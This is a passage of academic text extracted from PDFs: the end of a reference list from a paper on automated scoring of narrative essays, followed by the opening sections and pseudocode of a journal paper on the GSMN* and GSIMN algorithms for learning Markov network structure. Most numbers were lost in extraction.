, baltimore, ma, usa, june. beata beigman klebanov, jill burstein, nitin madnani, adam faulkner, and joel tetreault. . build- ing subjectivity lexicon(s) from scratch for essay data. computational linguistics and intelligent text pro- cessing, pages – . beata beigman klebanov, nitin madnani, jill burstein, and swapna somasundaran. . content impor- tance models for scoring writing from sources. in proceedings of the nd annual meeting of the asso- ciation for computational linguistics (short papers), pages – . taylor berg-kirkpatrick, david burkett, and dan klein. . an empirical investigation of statistical sig- nificance in nlp. in proceedings of the joint conference on empirical methods in natural lan- guage processing and computational natural lan- guage learning, pages – . association for computational linguistics. thomas bogel, jannik strotgen, and michael gertz. . computational narratology: extracting tense clusters from narrative texts. in nicoletta calzo- lari (conference chair), khalid choukri, thierry declerck, hrafn loftsson, bente maegaard, joseph mariani, asuncion moreno, jan odijk, and stelios piperidis, editors, proceedings of the ninth interna- tional conference on language resources and eval- uation, reykjavik, iceland, may. european language resources association (elra). hein broekkamp, tanja janssen, and huub van den bergh. . is there a relationship between litera- ture reading and creative writing? journal of creative behavior, ( ): – . jill burstein, daniel marcu, and kevin knight. . finding the write stuff: automatic identification of discourse structure in student essays. ieee intelligent systems, ( ): – . asli celikyilmaz, dilek hakkani-tur, hua he, greg kondrak, and denilson barbosa. . the actor- topic model for extracting social networks in literary narrative. in in proceedings of the th annual con- ference on neural information processing systems. nathanael chambers and dan jurafsky. . unsuper- vised learning of narrative event chains. in proceed- ings of acl- : hlt, pages – . nathanael chambers and dan jurafsky. . unsu- pervised learning of narrative schemas and their par- ticipants. in proceedings of the th annual meeting of the acl and the th ijcnlp of the afnlp, pages – . nathanael chambers. . event schema induction with a probabilistic entity-driven model. in proceed- ings of the conference on empirical methods in natural language processing, pages – , seattle, wa, october. eugene charniak. . toward a model of children’s story comprehension. technical report, mit, cam- bridge, ma, usa. snigdha chaturvedi, dan goldwasser, and hal daume iii. . ask, and shall you receive?: understanding desire fulfillment in natural language text. arxiv preprint arxiv: . . snigdha chaturvedi, shashank srivastava, hal daumé iii, and chris dyer. . modeling evolving relationships between characters in literary novels. in proceedings of the thirtieth association for the advancement of artificial intelligence conference on artificial intelligence, pages – . associ- ation for the advancement of artificial intelligence press. martin chodorow and jill burstein. . beyond essay length: evaluating e-rater’s performance on toefl essays. toefl research report , educational test- ing service, princeton, nj, usa. kenneth ward church and patrick hanks. . word association norms, mutual information, and lexicogra- phy. computational linguistics, ( ): – , march. jacob cohen. . weighted kappa: nominal scale agreement provision for scaled disagreement or partial credit. psychological bulletin, ( ): . marie-catherine de marneffe and christopher d. man- ning. . the stanford typed dependencies repre- sentation. in coling workshop on cross-framework and cross-domain parser evaluation. bradley efron and robert j. tibshirani. . an intro- duction to the bootstrap. crc press. scott elliot. . intellimetric: from here to valid- ity. automated essay scoring: a cross-disciplinary perspective, pages – . micha elsner. . character-based kernels for novel- istic plot structure. in proceedings of the th confer- ence of the european chapter of the association for computational linguistics, pages – . associa- tion for computational linguistics. david k. elson, nicholas dames, and kathleen r. mck- eown. . extracting social networks from literary fiction. in proceedings of the th annual meeting of the association for computational linguistics, pages – . association for computational linguistics. david k. elson. . modeling narrative discourse. ph.d. thesis, columbia university. noura farra, swapna somasundaran, and jill burstein. . scoring persuasive essays using opinions and their targets. in tenth workshop on innovative use of nlp for building educational applications. mark alan finlayson. . learning narrative struc- ture from annotated folktales. ph.d. thesis, mas- sachusetts institute of technology. mark a. finlayson. . a survey of corpora in compu- tational and cognitive narrative science. sprache und datenverarbeitung (international journal for lan- guage data processing), ( – ). monika fludernik. . an introduction to narratol- ogy. routledge, london. ronald b. gillam and nils a. pearson. . tnl: test of narrative language. austin, tx: pro-ed. amit goyal, ellen riloff, and hal daumé iii. . au- tomatically producing plot unit representations for nar- rative text. in proceedings of the conference on empircal methods in natural language processing, boston, ma. michael a. k. halliday and james r. martin. . writing science: literacy and discursive power. the falmer press, london. harry halpin and johanna d. moore. . event ex- traction in a plot advice agent. in proceedings of the st international conference on computational lin- guistics and the th annual meeting of the associ- ation for computational linguistics, pages – , stroudsburg, pa, usa. association for computational linguistics. franziska hartung, michael burke, peter hagoort, and roel m. willems. . taking perspective: personal pronouns affect experiential aspects of literary read- ing. plos one, ( ). bram jans, steven bethard, ivan vulic, and marie francine moens. . skip n-grams and ranking functions for predicting script events. in proceedings of the th conference of the euro- pean chapter of the association for computational linguistics, pages – , avignon, france, april. stephen p. klein, brian m. stecher, richard j. shavel- son, daniel mccaffrey, tor ormseth, robert m. bell, kathy comfort, and abdul r. othman. . an- alytic versus holistic scoring of science performance tasks. applied measurement in education, ( ): – . thomas k. landauer, darrell laham, and peter w. foltz. . automated scoring and annotation of essays with the intelligent essay assessor. automated essay scoring: a cross-disciplinary perspective, pages – . yong-won lee, claudia gentile, and robert kantor. . toward automated multi-trait scoring of essays: investigating links among holistic, analytic, and text feature scores. applied linguistics, ( ): – . wendy g. lehnert. . plot units and narrative sum- marization. cognitive science, ( ): – . inderjeet mani. . computational modeling of nar- rative. synthesis lectures on human language tech- nologies, ( ): – . christopher d. manning, mihai surdeanu, john bauer, jenny finkel, steven j. bethard, and david mcclosky. . the stanford corenlp natural language pro- cessing toolkit. in association for computational lin- guistics system demonstrations, pages – . neil mcintyre and mirella lapata. . plot induction and evolutionary search for story generation. in pro- ceedings of the th annual meeting of the associa- tion for computational linguistics, pages – , uppsala, sweden. anne mckeough, randy genereux, and joan jeary. . structure, content, and language usage: how do exceptional and average storywriters differ? high ability studies, ( ): – . phyllis mentzell, elizabeth vander lei, and duane h. roen. . audience considerations for evaluating writing. evaluating writing: the role of teacher’s knowledge about text, learning, and culture. mohsen mesgar and michael strube. . lexical coherence graph modeling using word embeddings. in proceedings of the conference of the north american chapter of the association for computa- tional linguistics: human language technologies, pages – . jon miller and robin chapman. . systematic anal- ysis of language transcripts. madison, wi: language analysis laboratory. nasrin mostafazadeh, nathanael chambers, xiaodong he, devi parikh, dhruv batra, pushmeet kohli lucy vanderwende, and james allen. . a corpus and cloze evaluation for deeper understanding of com- monsense stories. in proceedings of the confer- ence of the north american chapter of the associa- tion for computational linguistics: human language technologies, pages – , san diego, california, june - . association for computational linguis- tics. courtney napoles, matthew gormley, and benjamin van durme. . annotated gigaword. in proceed- ings of the joint workshop on automatic knowledge base construction & web-scale knowledge extrac- tion, pages – . huy nguyen and diane j. litman. . improv- ing argument mining in student essays by learning and exploiting argument indicators versus essay top- ics. in proceedings of the twenty-ninth international florida artificial intelligence research society con- ference, pages – . kiem-hieu nguyen, xavier tannier, olivier ferret, and romaric besancon. . generative event schema induction with entity disambiguation. in proceed- ings of the rd annual meeting of the association for computational linguistics and the th interna- tional joint conference on natural language process- ing, pages – , beijing, china, july. keith oatley. . meetings of minds: dialogue, sym- pathy, and identification, in reading fiction. poetics, : – . natalie g. olinghouse and jacqueline t. leaird. . the relationship between measures of vocabulary and narrative writing quality in second- and fourth-grade students. reading & writing, ( ): – . kieran o’loughlin. . lexical density in candidate output on direct and semi-direct versions of an oral proficiency test. language testing, : – . jessica ouyang and kathleen mckeown. . mod- eling reportable events as turning points in narrative. in proceedings of the conference on empiri- cal methods in natural language processing, pages – , lisbon, portugal. cecilia ovesdotter alm and richard sproat. . emo- tional sequencing and development in fairy tales. in international conference on affective computing and intelligent interaction, pages – . springer. ellis batten page. . computer grading of student prose, using modern concepts and software. the jour- nal of experimental education, ( ): – . robert parker, david graff, junbo kong, ke chen, and kazuaki maeda. . english gigaword fifth edi- tion. philadelphia: linguistic data consortium. rebecca j. passonneau, adam goodkind, and elena t. levy. . annotation of children’s oral narra- tions: modeling emergent narrative skills for com- putational applications. in proceedings of the twen- tieth international florida artificial intelligence re- search society conference, pages – . f. pedregosa, g. varoquaux, a. gramfort, v. michel, b. thirion, o. grisel, m. blondel, p. prettenhofer, r. weiss, v. dubourg, j. vanderplas, a. passos, d. cournapeau, m. brucher, m. perrot, and e. duches- nay. . scikit-learn: machine learning in python. journal of machine learning research, : – . douglas b. petersen, sandra laing gillam, and ronald b. gillam. . emerging procedures in nar- rative assessment: the index of narrative complexity. topics in language disorders, ( ): – . rashmi prasad, nikhil dinesh, alan lee, eleni milt- sakaki, livio robaldo, aravind k. joshi, and bon- nie l. webber. . the penn discourse treebank . . in proceedings of the sixth international confer- ence on language resources and evaluation. gerald prince. . a grammar of stories: an intro- duction. mouton, the hague. andrew j. reagan, lewis mitchell, dilan kiley, christo- pher m. danforth, and peter sheridan dodds. . the emotional arcs of stories are dominated by six ba- sic shapes. the european physical journal data sci- ence, ( ): . shlomith rimmon-kenan. . narrative fiction: contemporary poetics. routledge, london. roger c. schank and robert p. abelson. . scripts, plans, goals and understanding: an inquiry into hu- man knowledge structures. lawrence erlbaum asso- ciates, hillsdale, nj, usa. mark d. shermis and jill burstein. . handbook of automated essay evaluation: current applications and new directions. routledge. carlota s. smith. . aspectual entities and tense in discourse. in paula kempchinsky and roumyana slabakova, editors, aspectual inquiries, pages – . springer netherlands, dordrecht. swapna somasundaran, jill burstein, and martin chodorow. . lexical chaining for measuring discourse coherence quality in test-taker essays. in proceedings of the th international conference on computational linguistics: technical papers. swapna somasundaran, chong min lee, martin chodorow, and xinhao wang. . automated scor- ing of picture-based story narration. in proceedings of the tenth workshop on innovative use of nlp for building educational applications. swapna somasundaran, brian riordan, binod gyawali, and su-youn yoon. . evaluating argumentative and narrative essays using graphs. in proceedings of the th international conference on computational linguistics: technical papers, pages – , os- aka, japan, december. christian stab and iryna gurevych. . recogniz- ing insufficiently supported arguments in argumen- tative essays. in proceedings of the th conference of the european chapter of the association for com- putational linguistics: long papers, volume . nancy l. stein and christine g. glenn. . an anal- ysis of story comprehension in elementary school children: a test of a schema. new directions in dis- course processing. carol j. strong, mercer mayer, and marianna mayer. . the strong narrative assessment procedure. thinking publications. reid swanson, elahe rahimtoroghi, thomas corcoran, and marilyn a. walker. . identifying narrative clause types in personal stories. in proceedings of the th annual meeting of the special interest group on discourse and dialogue, page . jean ure. . lexical density and register differenti- ation. in perren g. e. and trim j. l. m., editors, ap- plications of linguistics. selected papers of the second international congress of applied linguistics, cam- bridge , pages – . cambridge university press, cambridge, uk. josep valls-vargas, jichen zhu, and santiago ontanón. . toward automatic role identification in unan- notated folk tales. in proceedings of the tenth asso- ciation for the advancement of artificial intelligence conference on artificial intelligence and interactive digital entertainment, pages – . advancement of artificial intelligence press. zeno vendler. . linguistics in philosophy. cornell university press, ithaca, ny. stephen g. ware, brent e. harrison, robert michael young, and david l. roberts. . initial results for measuring four dimensions of narrative conflict. in the fourth workshop on intelligent narrative tech- nologies at the ai and interactive digital enter- tainment conference. janyce m. wiebe. . tracking point of view in nar- rative. computational linguistics, ( ): – . theresa wilson, janyce wiebe, and paul hoffmann. . recognizing contextual polarity in phrase-level sentiment analysis. in proceedings of the conference on human language technology and empirical meth- ods in natural language processing, pages – . association for computational linguistics. guoxing yu. . lexical diversity in writing and speaking task performances. applied linguistics, ( ): – . plot_real.eps journal of artificial intelligence research ( ) - submitted / ; published / efficient markov network structure discovery using independence tests facundo bromberg fbromberg@frm.utn.edu.ar departamento de sistemas de información, universidad tecnológica nacional, mendoza, argentina dimitris margaritis dmarg@cs.iastate.edu vasant honavar honavar@cs.iastate.edu dept. of computer science, iowa state university, ames, ia abstract we present two algorithms for learning the structure of a markov network from data: gsmn∗ and gsimn. both algorithms use statistical independence tests to infer the struc- ture by successively constraining the set of structures consistent with the results of these tests. until very recently, algorithms for structure learning were based on maximum like- lihood estimation, which has been proved to be np-hard for markov networks due to the difficulty of estimating the parameters of the network, needed for the computation of the data likelihood. the independence-based approach does not require the computation of the likelihood, and thus both gsmn∗ and gsimn can compute the structure efficiently (as shown in our experiments). gsmn∗ is an adaptation of the grow-shrink algorithm of margaritis and thrun for learning the structure of bayesian networks. gsimn ex- tends gsmn∗ by additionally exploiting pearl’s well-known properties of the conditional independence relation to infer novel independences from known ones, thus avoiding the per- formance of statistical tests to estimate them. to accomplish this efficiently gsimn uses the triangle theorem, also introduced in this work, which is a simplified version of the set of markov axioms. experimental comparisons on artificial and real-world data sets show gsimn can yield significant savings with respect to gsmn∗, while generating a markov network with comparable or in some cases improved quality. we also compare gsimn to a forward-chaining implementation, called gsimn-fch, that produces all possible con- ditional independences resulting from repeatedly applying pearl’s theorems on the known conditional independence tests. the results of this comparison show that gsimn, by the sole use of the triangle theorem, is nearly optimal in terms of the set of independences tests that it infers. . introduction graphical models (bayesian and markov networks) are an important subclass of statisti- cal models that possess advantages that include clear semantics and a sound and widely accepted theoretical foundation (probability theory). graphical models can be used to represent efficiently the joint probability distribution of a domain. they have been used in numerous application domains, ranging from discovering gene expression pathways in bioinformatics (friedman, linial, nachman, & pe’er, ) to computer vision (e.g. geman c© ai access foundation. all rights reserved. bromberg, margaritis, & honavar figure : example markov network. the nodes represent variables in the domain v = { , , , , , , , }. & geman, , besag, york, & mollie, , isard, , anguelov, taskar, chatalbashev, koller, gupta, heitz, & ng, ). one problem that naturally arises is the construction of such models from data (heckerman, geiger, & chickering, , buntine, ). a solution to this problem, besides being theoretically interesting in itself, also holds the potential of advancing the state-of-the-art in application domains where such models are used. in this paper we focus on the task of learning markov networks (mns) from data in domains in which all variables are either discrete or continuous and distributed according to a multidimensional gaussian distribution. mns are graphical models that consist of two parts: an undirected graph (the model structure), and a set of parameters. an example markov network is shown in figure . learning such models from data consists of two in- terdependent tasks: learning the structure of the network, and, given the learned structure, learning the parameters. in this work we focus on the problem of learning the structure of the mn of a domain from data. we present two algorithms for mn structure learning from data: gsmn∗ (grow-shrink markov network learning algorithm) and gsimn (grow-shrink inference-based markov network learning algorithm). the gsmn∗ algorithm is an adaptation to markov networks of the gs algorithm by margaritis and thrun ( ), originally developed for learning the structure of bayesian networks. gsmn∗ works by first learning the local neighborhood of each variable in the domain (also called the markov blanket of the variable), and then using this information in subsequent steps to improve efficiency. although interesting and useful in itself, we use gsmn∗ as a point of reference of the performance with regard to time complexity and accuracy achieved by gsimn, which is the main result of this work. the gsimn algorithm extends gsmn∗ by using pearl’s theorems on the properties of the conditional independence relation (pearl, ) to infer additional independences from a set of independences resulting from statistical tests and previous inferences, thus avoiding the execution of these tests on data. this allows savings in execution time and, when data are distributed, communication bandwidth. the rest of the paper is organized as follows: in the next section we present previous research related to the problem. section introduces notation, definitions and presents some intuition behind the two algorithms. section contains the main algorithms, gsmn∗ and gsimn, as well as concepts and practical details related to their operation. we evaluate gsmn∗ and gsimn and present our results in section , followed by a summary of our efficient markov network structure discovery using independence tests work and possible directions of future research in section . appendices a and b contain proofs of correctness of gsmn∗ and gsimn. . related work markov networks have been used in the physics and computer vision communities (geman & geman, , besag et al., , anguelov et al., ) where they have been historically called markov random fields. recently there has been interest in their use for spatial data mining, which has applications in geography, transportation, agriculture, climatology, ecology and others (shekhar, zhang, huang, & vatsavai, ). one broad and popular class of algorithms for learning the structure of graphical models is the score-based approach, exemplified for markov networks by della pietra, della pietra, and lafferty ( ), and mccallum ( ). score-based approaches conduct a search in the space of legal structures in an attempt to discover a model structure of maximum score. due to the intractable size of the search space i.e., the space of all legal graphs, which is super-exponential in size, score-based algorithms must usually resort to heuristic search. at each step of the structure search, a probabilistic inference step is necessary to evaluate the score (e.g., maximum likelihood, minimum description length, lam & bacchus, , or pseudo-likelihood, besag, ). for bayesian networks this inference step is tractable and therefore several practical score-based algorithms for structure learning have been developed (lam & bacchus, , heckerman, , acid & de campos, ). for markov networks however, probabilistic inference requires the calculation of a normalizing constant (also known as partition function), a problem known to be np-hard (jerrum & sinclair, , barahona, ). a number of approaches have considered a restricted class of graphical models (e.g. chow & liu, , rebane & pearl, , srebro & karger, ). however, srebro and karger ( ) prove that finding the maximum likelihood network is np-hard for markov networks of tree-width greater than . some work in the area of structure learning of undirected graphical models has con- centrated on the learning of decomposable (also called chordal) mns (srebro & karger, ). an example of learning non-decomposable mns is presented in the work of hof- mann and tresp ( ), which is an approach for learning structure in continuous domains with non-linear relationships among the domain attributes. their algorithm removes edges greedily based on a leave-one-out cross validation log-likelihood score. a non-score based approach is in the work of abbeel, koller, and ng ( ), which introduces a new class of ef- ficient algorithms for structure and parameter learning of factor graphs, a class of graphical models that subsumes markov and bayesian networks. their approach is based on a new parameterization of the gibbs distribution in which the potential functions are forced to be probability distributions, and is supported by a generalization of the hammersley-clifford theorem for factor graphs. it is a promising and theoretically sound approach that may lead in the future to practical and efficient algorithms for undirected structure learning. in this work we present algorithms that belong to the independence-based or constraint- based approach (spirtes, glymour, & scheines, ). independence-based algorithms ex- ploit the fact that a graphical model implies that a set of independences exist in the distribu- tion of the domain, and therefore in the data set provided as input to the algorithm (under assumptions, see next section); they work by conducting a set of conditional independence bromberg, margaritis, & honavar tests on data, successively restricting the number of possible structures consistent with the results of those tests to a singleton (if possible), and inferring that structure as the only possible one. a desirable characteristic of independence-based approaches is the fact that they do not require the use of probabilistic inference during the discovery of the structure. also, such algorithms are amenable to proofs of correctness (under assumptions). for bayesian networks, the independence-based approach has been mainly exemplified by the sgs (spirtes et al., ), pc (spirtes et al., ), and algorithms that learn the markov blanket as a step in learning the bayesian network structure such as grow-shrink (gs) algorithm (margaritis & thrun, ), iamb and its variants (tsamardinos, aliferis, & statnikov, a), hiton-pc and hiton-mb (aliferis, tsamardinos, & statnikov, ), mmpc and mmmb (tsamardinos, aliferis, & statnikov, b), and max-min hill climbing (mmhc) (tsamardinos, brown, & aliferis, ), all of which are widely used in the field. algorithms for restricted classes such as trees (chow & liu, ) and polytrees (rebane & pearl, ) also exist. for learning markov networks previous work has mainly focused on learning gaussian graphical models, where the assumption of a continuous multivariate gaussian distribution is made; this results in linear dependences among the variables with gaussian noise (whit- taker, , edwards, ). more recent approaches are included in the works of dobra, hans, jones, nevins, yao, and west ( ), (castelo & roverato, ), peña ( ), and schäfer and strimmer ( ), that focus on applications of gaussian graphical models in bioinformatics. while we do not make the assumption of continuous gaussian variables in this paper, all algorithms we present are applicable to such domains with the use of an appropriate conditional independence test (such as partial correlation). the gsmn∗ and gsimn algorithms presented apply to any case where an arbitrary faithful distribu- tion can be assumed and a probabilistic conditional independence test for that distribution is available. the algorithms were first introduced by bromberg, margaritis, and honavar ( ); the contributions of the present paper include extending these results by conducting an extensive evaluation of their experimental and theoretical properties. more specifically, the contributions include an extensive and systematic experimental evaluation of the pro- posed algorithms on (a) data sets sampled from artificially generated networks of varying complexity and strength of dependences, as well as (b) data sets sampled from networks representing real-world domains, and (c) formal proofs of correctness that guarantee that the proposed algorithms will compute the correct markov network structure of the domain, under the stated assumptions. . notation and preliminaries we denote random variables with capitals (e.g., x, y, z) and sets of variables with bold capitals (e.g., x, y, z). in particular, we denote by v = { , . . . , n − } the set of all n variables in the domain. we name the variables by their indices in v; for instance, we refer to the third variable in v simply by . we denote the data set as d and its size (number of data points) by |d| or n . we use the notation (x⊥⊥y | z) to denote the proposition that x is independent of y conditioned on z, for disjoint sets of variables x, y, and z. (x ⊥⊥y | z) denotes conditional dependence. we use (x⊥⊥y | z) as shorthand for ({x}⊥⊥{y } | z) to improve readability. efficient markov network structure discovery using independence tests a markov network is an undirected graphical model that represents the joint probability distribution over v. each node in the graph represents one of the random variables in the domain, and absences of edges encode conditional independences among them. we assume the underlying probability distribution to be graph-isomorph (pearl, ) or faithful (spirtes et al., ), which means that it has a faithful undirected graph. a graph g is said to be faithful to some distribution if its graph connectivity represents exactly those dependencies and independences existent in the distribution. in detail, this means that that for all disjoint sets x, y, z ⊆ v, x is independent of y given z if and only if the set of vertices z separates the set of vertices x from the set of vertices y in the graph g (this is sometimes called the global markov property, lauritzen, ). in other words, this means that, after removing all vertices in z from g (including all edges incident to each of them), there exists no (undirected) path in the remaining graph between any variable in x to some variable in y. for example, in figure , the set of variables { , } separates set { , } from set { }. more generally, it has been shown (pearl, ; theorem , page and definition of graph isomorphism, page ) that a necessary and sufficient condition for a distribution to be graph-isomorph is for its set of independence relations to satisfy the following axioms for all disjoint sets of variables x, y, z, w and individual variable γ: (symmetry) (x⊥⊥y | z) ⇐⇒ (y⊥⊥x | z) (decomposition) (x⊥⊥y ∪ w | z) ⇐⇒ (x⊥⊥y | z) ∧ (x⊥⊥w | z) (intersection) (x⊥⊥y | z ∪ w) ( )∧ (x⊥⊥w | z ∪ y) =⇒ (x⊥⊥y ∪ w | z) (strong union) (x⊥⊥y | z) =⇒ (x⊥⊥y | z ∪ w) (transitivity) (x⊥⊥y | z) =⇒ (x⊥⊥γ | z) ∨ (γ⊥⊥y | z) for the operation of the algorithms we also assume the existence of an oracle that can answer statistical independence queries. these are standard assumptions that are needed for formally proving the correctness of independence-based structure learning algorithms (spirtes et al., ). . independence-based approach to structure learning gsmn∗ and gsimn are independence-based algorithms for learning the structure of the markov network of a domain. this approach works by evaluating a number of statistical independence statements, reducing the set of structures consistent with the results of these tests to a singleton (if possible), and inferring that structure as the only possible one. as mentioned above, in theory we assume the existence of an independence-query oracle that can provide information about conditional independences among the domain variables. this can be viewed as an instance of a statistical query oracle (kearns & vazirani, ). in practice such an oracle does not exist; however, it can be implemented approximately by a statistical test evaluated on the data set d. for example, for discrete data this can be pearson’s conditional independence chi-square (χ ) test (agresti, ), a mutual information test etc. for continuous gaussian data a statistical test that can be used to measure conditional independence is partial correlation (spirtes et al., ). to determine conditional independence between two variables x and y given a set z from data, the bromberg, margaritis, & honavar statistical test returns a p-value. the p-value of a test equals the probability of obtaining a value for the test statistic that is at least as extreme as the one that was actually observed given that the null hypothesis is true, which corresponds to conditional independence in our case. assuming that the p-value of a test is p(x, y | z), the statistical test concludes dependence if and only if p(x, y | z) is less than or equal to a threshold α i.e., (x ⊥⊥y | z) ⇐⇒ p(x, y | z) ≤ α. the quantity − α is sometimes referred to as the test’s confidence threshold. we use the standard value of α = . in all our experiments, which corresponds to a confidence threshold of %. in a faithful domain, it can be shown (pearl & paz, ) that an edge exists between two variables x = y ∈ v in the markov network of that domain if an only if they are dependent conditioned on all remaining variables in the domain, i.e., (x, y ) is an edge iff (x ⊥⊥y | v −{x, y }). thus, to learn the structure, theoretically it suffices to perform only n(n − )/ tests i.e., one test (x, y | v −{x, y }) for each pair of variables x, y ∈ v, x = y . unfortunately, in non-trivial domains this usually involves a test that conditions on a large number of variables. large conditioning sets produce sparse contingency tables (count histograms) which result in unreliable tests. this is because the number of possible configurations of the variables grows exponentially with the size of the conditioning set—for example, there are n cells in a test involving n binary variables, and to fill such a table with one data point per cell we would need a data set of at least exponential size i.e., n ≥ n. exacerbating this problem, more than one data point per cell is typically necessary for a reliable test: as recommended by cochran ( ), if more than % of the cells of the contingency table have less than data points the test is deemed unreliable. therefore both gsmn∗ and gsimn algorithms (presented below) attempt to minimize the conditioning set size; they do that by choosing an order of examining the variables such that irrelevant variables are examined last. . algorithms and related concepts in this section we present our main algorithms, gsmn∗ and gsimn, and supporting con- cepts required for their description. for the purpose of aiding the understanding of the reader, before discussing these we first describe the abstract gsmn algorithm in the next section. this helps in showing the intuition behind the algorithms and laying the foundation for them. . the abstract gsmn algorithm for the sake of clarity of exposition, before discussing our first algorithm gsmn∗, we describe the intuition behind it by describing its general structure using the abstract gsmn algorithm which deliberately leaves a number of details unspecified; these are filled-in in the concrete gsmn∗ algorithm, presented in the next section. note that the choices for these efficient markov network structure discovery using independence tests algorithm gsmn algorithm outline: g = gsmn (v, d). : initialize g to the empty graph. : for all variables x in the domain v do : /* learn the markov blanket bx of x using the gs algorithm. */ : bx ← gs (x, v, d) : add an undirected edge in g between x and each variable y ∈ bx . : return g algorithm gs algorithm. returns the markov blanket bx of variable x ∈ v: bx = gs (x, v, d). : bx ← ∅ : /* grow phase. */ : for each variable y in v −{x} do : if (x ⊥⊥y | bx ) (estimated using data d) then : bx ← bx ∪{y } : goto /* restart grow loop. */ : /* shrink phase. */ : for each variable y in bx do : if (x⊥⊥y | bx −{y }) (estimated using data d) then : bx ← bx −{y } : goto /* restart shrink loop. */ : return bx details are a source of optimizations that can reduce the algorithm’s computational cost. we make these explicit when we discuss the concrete gsmn∗ and gsimn algorithms. the abstract gsmn algorithm is shown in algorithm . given as input a data set d and a set of variables v, gsmn computes the set of nodes (variables) bx that are adjacent to each variable x ∈ v; these completely determine the structure of the domain mn. the algorithm consists of a main loop in which it learns the markov blanket bx of each node (variable) x in the domain using the gs algorithm. it then constructs the markov network structure by connecting x with each variable in bx . the gs algorithm was first proposed by margaritis and thrun ( ) and is shown in algorithm . it consists of two phases, a grow phase and a shrink phase. the grow phase of x proceeds by attempting to add each variable y to the current set of hypothesized neighbors of x, contained in bx , which is initially empty. bx grows by some variable y during each iteration of the grow loop of x if and only if y is found dependent with x given the current set of hypothesized neighbors bx . due to the (unspecified) ordering that the variables are examined (this is explicitly specified in the concrete gsmn∗ algorithm, presented in the next section), at the end of the grow phase some of the variables in bx might not be true neighbors of x in the underlying mn—these are called false positives. this justifies the shrink phase of the algorithm, which removes each false positive y in bx by testing for independence with x conditioned on bx −{y }. if y is found independent of x during the shrink phase, it cannot be a true neighbor (i.e., there cannot be an edge x−y ), and gsmn removes it from bx . assuming faithfulness and correctness of the independence query results, by the end of the shrink phase bx contains exactly the neighbors of x in the underlying markov network. bromberg, margaritis, & honavar in the next section we present a concrete implementation of gsmn, called gsmn∗. this augments gsmn by specifying a concrete ordering that the variables x are examined in the main loop of gsmn (lines – in algorithm ), as well as a concrete order that the variables y are examined in the grow and shrink phases of the gs algorithm (lines – and – in algorithm , respectively). . the concrete gsmn∗ algorithm in this section we discuss our first algorithm, gsmn∗ (grow-shrink markov network learning algorithm), for learning the structure of the markov network of a domain. note that the reason for introducing gsmn∗ in addition to our main contribution, the gsimn algorithm (presented later in section . ), is for comparison reasons. in particular, gsimn and gsmn∗ have identical structure, following the same order of examination of variables, with their only difference being the use of inference by gsimn (see details in subsequent sections). introducing gsmn∗ therefore makes it possible to measure precisely (through our experimental results in section ) the benefits of the use of inference on performance. the gsmn∗ algorithm is shown in algorithm . its structure is similar to the abstract gsmn algorithm. one notable difference is that the order that variables are examined is now specified; this is done in the initialization phase where the so-called examination order π and grow order λx of each variable x ∈ v is determined. π and all λx are priority queues and each is initially a permutation of v (λx is a permutation of v −{x}) such that the position of a variable in the queue denotes its priority e.g., π = [ , , ] means that variable has the highest priority (will be examined first), followed by and finally by . similarly, the position of a variable in λx determines the order it will be examined during the grow phase of x. during the initialization phase the algorithm computes the strength of unconditional dependence between each pair of variable x and y , as given by the unconditional p-value p(x, y | ∅) of an independence test between each pair of variables x = y , denoted by pxy in the algorithm. (in practice the logarithm of the p-values is computed, which allows greater precision in domains where some dependencies may be very strong or very weak.) in particular, the algorithm gives higher priority to (examines earlier) those variables with a lower average log p-value (line ), indicating stronger dependence. this average is defined as: avg y log(pxy ) = |v|− ∑ y =x log(pxy ). for the grow order λx of variable x, the algorithm gives higher priority to those variables y whose p-value (or equivalently the log of the p-value) with variable x is small (line ). this ordering is due to the intuition behind the “folk-theorem” (as koller & sahami, , puts it) that states that probabilistic influence or association between attributes tends to attenuate over distance in a graphical model. this suggests that a pair of variables x and y with high unconditional p-value are less likely to be directly linked. note that this ordering is a heuristic and is not guaranteed to hold in general. for example, it may not hold if the underlying domain is a bayesian network e.g., two “spouses” may be independent unconditionally but dependent conditional on a common child. note however that this example does not apply to faithful domains i.e., graph-isomorph to a markov network. also efficient markov network structure discovery using independence tests algorithm gsmn∗, a concrete implementation of gsmn: g = gsmn ∗(v, d). : initialize g to the empty graph. : /* initialization. */ : for all x, y ∈ v, x = y do : pxy ← p(x, y | ∅) : initialize π such that ∀i, i′ ∈{ , . . . , n − }, [ i < i′ ⇐⇒ avg j log(pπij ) < avg j log(pπi′ j ) ] . : for all x ∈ v do : bx ← ∅ : initialize λx such that ∀j, j′ ∈{ , . . . , n − }, [ j < j′ ⇐⇒ pxλx j < pxλx j′ ] . : remove x from λx . : /* main loop. */ : while π is not empty do : x ← dequeue(π) : /* propagation phase. */ : t ←{y : y was examined and x ∈ by } : f ←{y : y was examined and x /∈ by } : for all y ∈ t, move y to the end of λx . : for all y ∈ f, move y to the end of λx . : /* grow phase. */ : s ← ∅ : while λx not empty do : y ← dequeue(λx ) : if pxy ≤ α then : if ¬igsmn∗ (x, y, s, f, t) then : s ← s ∪{y } : /* change grow order of y . */ : move x to the beginning of λy . : for w = s|s|− to s do : move w to the beginning of λy . : /* change examination order. */ : for w = s|s|− to s do : if w ∈ π then : move w to the beginning of π. : break to line : /* shrink phase. */ : for y = s|s|− to s do : if igsmn∗ (x, y, s −{y } , f, t) then : s ← s −{y } : bx ← s : add an undirected edge in g between x and each variable y ∈ bx . : return g note that the correctness of all algorithms we present does not depend on it holding i.e., as we prove in appendices a and b, both gsmn∗ and gsimn are guaranteed to return the correct structure under the assumptions stated in section above. also note that the computational cost for the calculation of pxy is low due to the empty conditioning set. the remaining of the gsmn∗ algorithm contains the main loop (lines – ) in which each variable in v is examined according to the examination order π, determined during bromberg, margaritis, & honavar algorithm igsmn∗ (x, y, s, f, t): calculate independence test (x, y | s) by propaga- tion, if possible, otherwise run a statistical test on data. : /* attempt to infer dependence by propagation. */ : if y ∈ t then : return false : /* attempt to infer independence by propagation. */ : if y ∈ f then : return true : /* else do statistical test on data. */ : t ← (p(x,y |z)>α) /* t = true iff p-value of statistical test (x, y | s) > α. */ : return t the initialization phase. the main loop includes three phases: the propagation phase (lines – ), the grow phase (lines – ), and the shrink phase (lines – ). the propagation phase is an optimization in which all variables y for which by has already been computed (i.e., all variables y already examined) are collected in two sets f and t. set f (t) contains all variables y such that x /∈ by (x ∈ by ). both sets are passed to the independence procedure igsmn∗ , shown in algorithm , for the purpose of avoiding the execution of any tests between x and y by the algorithm. this is justified by the fact that, in undirected graphs, y is in the markov blanket of x if and only if x is in the markov blanket of y . variables y already found not to contain x in their blanket by (set f) cannot be members of bx because there exists some set of variables that has 